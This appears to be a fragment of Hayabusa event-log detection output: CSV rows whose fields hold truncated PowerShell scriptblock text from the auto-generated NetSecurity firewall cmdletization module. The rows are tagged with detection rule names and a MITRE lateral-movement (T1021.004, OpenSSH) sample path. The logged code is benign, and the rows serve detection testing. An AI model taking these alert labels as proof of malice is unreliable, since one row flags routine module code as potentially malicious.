$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { 
[object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} 
} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,eter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = 
